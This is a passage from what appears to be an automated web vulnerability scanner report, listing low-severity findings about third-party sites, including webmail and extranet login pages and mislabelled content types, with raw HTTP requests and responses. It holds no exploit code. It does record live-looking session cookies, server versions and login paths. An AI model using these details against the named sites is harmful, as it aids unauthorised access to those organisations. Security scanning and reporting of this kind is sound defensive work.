nyt-m=A61A961B774C8275E676733D3F0E8B0E&e=i.1306900800&t=i.20&v=i.1&l=l.15.313598328.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.2&g=i.0&er=i.1304360120&vr=l.4.1.0.0.0&pr=l.4.12.0.0.0&vp=i.0&gf=l.20.313598328.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Thu, 12 May 2011 11:16:10 GMT
Content-type: text/html
Cache-Control: private
Content-Length: 54

<!-- This file is used by NewsPeple. Do not delete -->

27.28. http://wd.sharethis.com/api/getCount2.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://wd.sharethis.com
Path:   /api/getCount2.php

Request

GET /api/getCount2.php?cb=stButtons.processCB&url=http%3A%2F%2Fwww.mimecast.com%2FNews-and-views%2FPress-releases%2FDates%2F2011%2F5%2FMimecast-strengthens-channel-team-with-appointment-of-new-UK-Channel-Director%2F HTTP/1.1
Host: wd.sharethis.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.mimecast.com/News-and-views/Press-releases/Dates/2011/5/Mimecast-strengthens-channel-team-with-appointment-of-new-UK-Channel-Director/
Cookie: __stid=CspjoE3JR6aX8hTKEPglAg==

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:36:44 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 360

stButtons.processCB({"url":"http:\/\/www.mimecast.com\/News-and-views\/Press-releases\/Dates\/2011\/5\/Mimecast-strengthens-channel-team-with-appointment-of-new-UK-Channel-Director\/","total":0,"ourl"
...[SNIP]...

27.29. https://webmail-us.mimecast.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://webmail-us.mimecast.com
Path:   /

Request

GET / HTTP/1.1
Host: webmail-us.mimecast.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.tuckerellis.com/info/employee-access

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"210-1297546086000"
Last-Modified: Sat, 12 Feb 2011 21:28:06 GMT
Content-Type: text/html
Content-Length: 210
Date: Thu, 12 May 2011 12:34:16 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<title>Redirecting</title>
<meta http-equiv="REFRESH" content="0;url=/webMail/login.jsp"></HEAD>
<BODY>
Redirecting
</BODY>
...[SNIP]...

27.30. https://webmail-us.mimecast.com/webMail/login.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   https://webmail-us.mimecast.com
Path:   /webMail/login.jsp

Request

GET /webMail/login.jsp HTTP/1.1
Host: webmail-us.mimecast.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Pragma: No-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 19:00:00 EST
Set-Cookie: JSESSIONID=A558B2D6AC4AE657DD0F627D7073BB13; Path=/webMail; Secure
Content-Type: text/html
Vary: Accept-Encoding
Date: Thu, 12 May 2011 12:34:17 GMT
Content-Length: 11504


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" />
<title>Mimecast Login</title>

...[SNIP]...

27.31. http://webmail.tuckerellis.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://webmail.tuckerellis.com
Path:   /

Request

GET / HTTP/1.1
Host: webmail.tuckerellis.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.tuckerellis.com/info/employee-access
Cookie: __utma=58675247.1267848493.1305202904.1305202904.1305202904.1; __utmb=58675247.9.10.1305202904; __utmc=58675247; __utmz=58675247.1305202904.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Tucker%20Ellis%20%26%20West

Response

HTTP/1.1 200 OK
Content-Length: 98
Content-Type: text/html
Content-Location: http://webmail.tuckerellis.com/index.html
Last-Modified: Sat, 31 Jan 2004 01:56:03 GMT
Accept-Ranges: bytes
ETag: "e74913629de7c31:2a7"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 12 May 2011 12:33:27 GMT

<html>
<body onload="window.location='https://webmail.tuckerellis.com/exchange'"></body>
</html>

27.32. http://www.apolloic.com/public/home.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.apolloic.com
Path:   /public/home.asp

Request

GET /public/home.asp HTTP/1.1
Host: www.apolloic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCCDBARRT=FEIJJBNBENDIJBGBGDNPLAMF

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Thu, 12 May 2011 11:40:55 GMT
Content-Length: 5797
Content-Type: text/html
Expires: Thu, 12 May 2011 11:39:55 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET


<html>

<head>
   <title>Apollo Investment Corporation</title>
   <meta name="description" content="Apollo Investment Corporation (NASDAQ: AINV), managed by Apollo Investment Management, provide
...[SNIP]...

27.33. http://www.carlyle.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.carlyle.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
Host: www.carlyle.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=186619067.604400709.1305200382.1305200382.1305200382.1; __utmb=186619067; __utmc=186619067; __utmz=186619067.1305200382.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Content-Length: 1815
Content-Type: text/html
Content-Location: http://www.carlyle.com/PageNotFound.html?404;http://www.carlyle.com:80/favicon.ico
Last-Modified: Thu, 05 May 2011 19:07:25 GMT
Accept-Ranges: bytes
ETag: "a69f53ab57bcc1:523"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 12 May 2011 11:41:09 GMT

<html>
<head>
<title>The Carlyle Group : Page Not Found</title>
   <style type="text/css">
       #errorBox {
           width:400px;
           padding:12px;
           font-family: Arial, Helvetica, sans-serif;
           text-
...[SNIP]...

27.34. http://www.conferenceservers.com/browser/proxy.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.conferenceservers.com
Path:   /browser/proxy.asp

Request

GET /browser/proxy.asp HTTP/1.1
Host: www.conferenceservers.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.soundpatheview.com/

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR OPTa BUS OTC"
X-UA-Compatible: IE=EmulateIE8
X-Powered-By: ASP.NET
Content-Length: 843
Content-Type: text/html
Cache-Control: private
Date: Thu, 12 May 2011 12:25:03 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: ASPSESSIONIDQCAATBRT=MCBAGIKBAKINNJGFEALBPACN; path=/


// WebDialogs WebInterpoint Client Login Utilities
// This file contains functions which are commonly used by login pages.

var proxy='173.193.214.243'; // This value was detected server side
fu
...[SNIP]...

27.35. http://www.managedfuturespecialist.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.managedfuturespecialist.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
Host: www.managedfuturespecialist.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 11:06:07 GMT
Content-Type: text/html
Connection: keep-alive
Server: Apache/Nginx/Varnish
Last-Modified: Mon, 17 May 2010 19:11:59 GMT
ETag: "d2e29bc8-4e4-486ceffc79be2"
Vary: Accept-Encoding
Accept-Ranges: bytes
Age: 0
Content-Length: 1252

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>

   <head>
    <title>404 Error - Page Not Found</title>
   </head>
   
   <body>
       <table style="border: 1px dashed rgb(204, 204, 204)
...[SNIP]...

27.36. http://www.milbank.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.milbank.com
Path:   /

Request

GET / HTTP/1.1
Host: www.milbank.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?q=Milbank+Tweed+Hadley+%26+McCloy&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a

Response

HTTP/1.1 200 OK
Content-Length: 160
Content-Type: text/html
Content-Location: http://www.milbank.com/Default.htm
Last-Modified: Tue, 15 May 2007 20:16:15 GMT
Accept-Ranges: bytes
ETag: "d1b1fe42d97c71:23a"
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Date: Thu, 12 May 2011 12:21:31 GMT

<html>
<head>
<title>Milbank, Tweed, Hadley &amp; McCloy LLP</title>
<META HTTP-EQUIV="Refresh" CONTENT="0; URL=http://www.milbank.com/en">
</head>
</html>

27.37. http://www.milbank.com/clientweb/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.milbank.com
Path:   /clientweb/

Request

GET /clientweb/ HTTP/1.1
Host: www.milbank.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.milbank.com/en/Attorneys/s-u/SearchResults.htm?Search=alphabetical&Char=X
Cookie: ASP.NET_SessionId=2l3npqztwgswxyek3nbgdm45

Response

HTTP/1.1 200 OK
Content-Length: 817
Content-Type: text/html
Content-Location: http://www.milbank.com/clientweb/index.htm
Last-Modified: Wed, 23 Dec 2009 17:06:32 GMT
Accept-Ranges: bytes
ETag: "70eb8246f283ca1:23a"
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Date: Thu, 12 May 2011 12:30:17 GMT

<html>

<head>
<title>Milbank Extranet</title>
</head>

<frameset framespacing="0" border="false" frameborder="0" rows="45,*,15">
<frame name="Index_Top" scrolling="no" target="contents" src=
...[SNIP]...

27.38. http://www.milbank.com/clientweb/MTHM_main_bot.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.milbank.com
Path:   /clientweb/MTHM_main_bot.html

Request

GET /clientweb/MTHM_main_bot.html HTTP/1.1
Host: www.milbank.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.milbank.com/clientweb/
Cookie: ASP.NET_SessionId=2l3npqztwgswxyek3nbgdm45

Response

HTTP/1.1 200 OK
Content-Length: 374
Content-Type: text/html
Last-Modified: Wed, 07 Nov 2007 20:16:45 GMT
Accept-Ranges: bytes
ETag: "734f261e7b21c81:23a"
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Date: Thu, 12 May 2011 12:30:18 GMT

<html>

<head>
<title>Milbank, Tweed, Hadley &amp; McCloy LLP</title>
<base target="contents">
</head>

<body bgcolor="#FF9000" leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
<
...[SNIP]...

27.39. http://www.milbank.com/clientweb/MTHM_main_top.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.milbank.com
Path:   /clientweb/MTHM_main_top.html

Request

GET /clientweb/MTHM_main_top.html HTTP/1.1
Host: www.milbank.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.milbank.com/clientweb/
Cookie: ASP.NET_SessionId=2l3npqztwgswxyek3nbgdm45

Response

HTTP/1.1 200 OK
Content-Length: 1415
Content-Type: text/html
Last-Modified: Wed, 23 Dec 2009 17:06:32 GMT
Accept-Ranges: bytes
ETag: "11898046f283ca1:23a"
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Date: Thu, 12 May 2011 12:30:21 GMT

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML//EN">
<html>

<head>
<meta name="GENERATOR" content="Microsoft FrontPage 6.0">
<base target="Main_Page">
<style type="text/css">
A:Link {color:#ffffff;
...[SNIP]...

27.40. http://www.moritthock.com/index.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.moritthock.com
Path:   /index.php

Request

GET /index.php?css={stylesheet=global/nav HTTP/1.1
Host: www.moritthock.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.moritthock.com/
Cookie: exp_last_visit=989860893; exp_last_activity=1305220893; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:21:36 GMT
Server: Apache
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Content-Length: 11
Content-Type: text/html

Invalid URI

27.41. http://www.nytimes.com/adx/bin/adx_remote.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nytimes.com
Path:   /adx/bin/adx_remote.html

Request

GET /adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/dealbook/post&posall=XXL,TopAd,Bar1,Position1,Position1B,Top5,SponLink,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Frame6A,Left2,Left3,Left4,Left5,Left6,Left7,Left8,Left9,JMNow1,JMNow2,JMNow3,JMNow4,JMNow5,JMNow6,Feature1,Spon3,ADX_CLIENTSIDE,SponLink2&query=qstring&keywords=Mergers+&+Acquisitions;Investment+Banking;I+PO;I.P.O.s;IPOs;Offerings;Private+Equity;Hedge+Funds;Venture+Capital;Legal;The+New+York+Times;Andrew+Ross+Sorkin;Andrew+Sorkin;+DealBook;deal+maker;Wall+street;wall+st.;Goldman+Sachs;Goldman+Sachs+Group;Morgan+Stanley;Morgan+Stanley+Smith+Barney;Citigroup;Citibank;Citi;Citicorp;Bank+of+America;Bank+of+America+Merrill+Lynch;Merrill+Lynch;Merrill;JPMorgan+Chase;J.P.+Morgan+Chase;J.+P.+Morgan+Chase;J.P.+Morgan+Securities;Bear+Stearns;Lehman+Brothers;Credit+Suisse;Credit+Suisse+First+Boston;CSFB;UBS;Deutsche+Bank;SAC+Capital;S.A.C.+Capital;Stevie+Cohen;Henry+Kravis;KKR;Kohlberg+Kravis+Roberts;Stephen+Schwarzman;Stephen+A.+Schwarzman;Steve+Schwarzman;Blackstone+Group;animal-kingdom;boston-celtics;carl-pascarella;churchill-downs;david-bonderman;detroit-pistons;kentucky-derby;new-york-mets-org;platinum-equity;private-equity;retailleisure;steven-a-cohen;team-valor-international;tom-gores;tpgtexas-pacific-group HTTP/1.1
Host: www.nytimes.com
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/2011/05/09/private-equity-has-a-horse-in-this-race/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RMID=27fdc70e4ff84dbef4b4b43a; news_people_toolbar=NO; ebNewBandWidth_.www.nytimes.com=2534%3A1304378197383; nyt-recmod=1; nyt-nofb=0; __utmz=69104142.1305112069.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=69104142.1451073784.1305112061.1305112061.1305112061.1; UserPersNYTRS=RecentLastSearch=/sales/new-york-ny-usa/1000000-99000000-price&RecentSearch=For+Sale_New+York_NY_%241%2c000%2c000-%2499%2c000%2c000%5e%2fsales%2fnew-york-ny-usa%2f1000000-99000000-price; NYTMapState=MapState=map_default; adxcl=t*26edd=4e32303f:1305112022; nyt-m=E3DB375A9111923DC1D65DE89ACF26F3&e=i.1306900800&t=i.20&v=i.1&l=l.15.313598328.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.2&g=i.0&er=i.1304360120&vr=l.4.1.0.0.0&pr=l.4.9.0.0.0&vp=i.0&gf=l.20.313598328.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1; rsi_segs=D08734_70008|D08734_72078|H07707_11017|H07707_11018|H07707_11028|H07707_11029|H07707_11030|H07707_11031|H07707_11044|H07707_11048|H07707_10638; WT_FPC=id=173.193.214.243-4039295808.30148852:lv=1305112816444:ss=1305112015513; _chartbeat2=sb4nmgc9whf8empd

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Thu, 12 May 2011 11:03:02 GMT
Content-type: text/html
Set-cookie: adxcl=t*26edd=4e32303f:1305112022; expires=Friday, 11-May-2012 11:03:02 GMT; path=/; domain=.nytimes.com
Set-cookie: adxcs=si=0:1|s*192f7=0:1; path=/; domain=.nytimes.com
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-control: no-cache
Pragma: no-cache
Content-Length: 22704


var adxads = new Array(11);

adxads[0] = "<img src=\"http://graphics8.nytimes.com/ads/blank.gif\">";
adxpos_Bottom7 = 0;

adxads[1] = "<script> function safeMultiTrack() { if ('dcsMultiTrack' in wind
...[SNIP]...

27.42. https://www.usaa.com/inet/imco_mutualfund/ImMutualFunds

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.usaa.com
Path:   /inet/imco_mutualfund/ImMutualFunds

Request

GET /inet/imco_mutualfund/ImMutualFunds?FundGroup=EQ&adid=icmsch105989004 HTTP/1.1
Host: www.usaa.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Env: DCITC
Content-Type: text/html
Content-Language: en-US
Date: Thu, 12 May 2011 11:24:17 GMT
Connection: keep-alive
Vary: Accept-Encoding
Set-Cookie: JSESSIONID=0001Y8Xm6NLmr5TSgq_ZSnYB1Cq:152vuh6gi; Path=/inet; Domain=.usaa.com
Set-Cookie: MemberGlobalSession=2:1001:4WCSMG1D143X7EVESDUQU; Path=/; Domain=.usaa.com; Secure
Set-Cookie: tempCookie=testCookie
Set-Cookie: dcenv=DCITC; path=/; domain=usaa.com
Content-Length: 5180

<html>
<head>
<noscript><meta http-equiv="refresh" content="0; url=https://www.usaa.com/inet/imco_mutualfund/ImMutualFunds?FundGroup=EQ&adid=icmsch105989004&bpjs=false"></noscript>
<script language="J
...[SNIP]...

28. Content type incorrectly stated
There are 59 instances of this issue:

Issue background

If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly, analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data, this may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.


28.1. http://207.56.166.97/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://207.56.166.97
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: 207.56.166.97
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:41:45 GMT
Server: Apache/2.0.64 (Red Hat)
Last-Modified: Tue, 29 Jul 2008 19:11:49 GMT
ETag: "1e8c7bb-e36-696a0740"
Accept-Ranges: bytes
Content-Length: 3638
Connection: close
Content-Type: text/plain

..............h...&... ..............(....... ...........@.............................i._=......~c>.....;........yV.....I/....u.......................r.......s.Z7...].....A&........................
...[SNIP]...

28.2. http://207.56.166.97/javascript/c_smartmenus.js

Summary

Severity:   Information
Confidence:   Firm
Host:   http://207.56.166.97
Path:   /javascript/c_smartmenus.js

Issue detail

The response contains the following Content-type statement:

Content-Type: application/x-javascript

The response states that it contains script. However, it actually appears to contain HTML.

Request

GET /javascript/c_smartmenus.js HTTP/1.1
Host: 207.56.166.97
Proxy-Connection: keep-alive
Referer: http://wolfgreenfield.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:01:53 GMT
Server: Apache/2.0.64 (Red Hat)
Last-Modified: Tue, 29 Jul 2008 19:11:31 GMT
ETag: "1e985d8-45d5-68575ec0"
Accept-Ranges: bytes
Content-Length: 17877
Connection: close
Content-Type: application/x-javascript

/*
========================================
SmartMenus v6.0.2 Script Core
Commercial License No.: UN-LICENSED
========================================
Please note: THIS IS NOT FREE SOFTWARE.
Licen
...[SNIP]...

28.3. http://ads1.revenue.net/j

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ads1.revenue.net
Path:   /j

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /j?site_id=12169&pplacement_id=1&r_num=58437537 HTTP/1.1
Host: ads1.revenue.net
Proxy-Connection: keep-alive
Referer: http://pepperhamilton.com/?epl=7VC_ZCF-qAinEUr8RrN2ElD1UYCHhMIpkrv4HU2ICSZqhp18zI-zQHkE8C0nDiTMgf6MYi8CRELFJtdUQvTEgSRGY6_nrN4UxmreqxnQEBZqbC2uTdEKuiAxNRMZ27auTDPfJeH2pRYyoMlkMtKon5opgpo8kGkayibaQBF1ACAQ3Oe_AADgfwUAAECA2wgAAKo-CvBZUyZZQTE2aFpCgwAAAPA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Train0=.CAB9sOjE6MToxMjE2OToyMjcyNDU6MzQ0MDo3MzQzODkxNDoxOjA6MTMwMzU3NzM4MjoxsAEEMzQxODI6LSkEAIwEmgJ8dnQEIAdOATE3dAVgDAIzNDExNylEAQktOjEzMDM1MzQxODIRAAA=

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:01:54 GMT
Server: Oversee Webserver v1.3.20
Vary: Accept-Encoding
Cache-control: private, no-cache, must-revalidate
Pragma: no-cache
P3P: policyref="/w3c/revenue.xml", CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Connection: close
O_CREATIVE_ID: 227245
Set-Cookie: Train0=.CAB92OjE6MToxMjE2OToyMjcyNDU6MzQ0MDo1ODQzNzUzNzoxOjA6MTMwNTI0NDkxNDoxsAEEMDE3MTQ6LSkEAAcxMzA1MjAxNzE0EQAA; path=/; domain=.revenue.net; expires=Fri, 10 Jun 2022 05:05:41 GMT
Content-Type: text/html
Content-Length: 331

document.write('<SCRIPT TYPE="text/javascript" SRC="http://panther1.cpxinteractive.com/mz/ds.js"></SCRIPT>');


document.write('<script language="JavaScript" src="http://ads1.revenue.net/load/2
...[SNIP]...

28.4. http://amch.questionmarket.com/adscgen/sta.php

Summary

Severity:   Information
Confidence:   Firm
Host:   http://amch.questionmarket.com
Path:   /adscgen/sta.php

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /adscgen/sta.php?survey_num=909615&site=312253240&code=214693346 HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
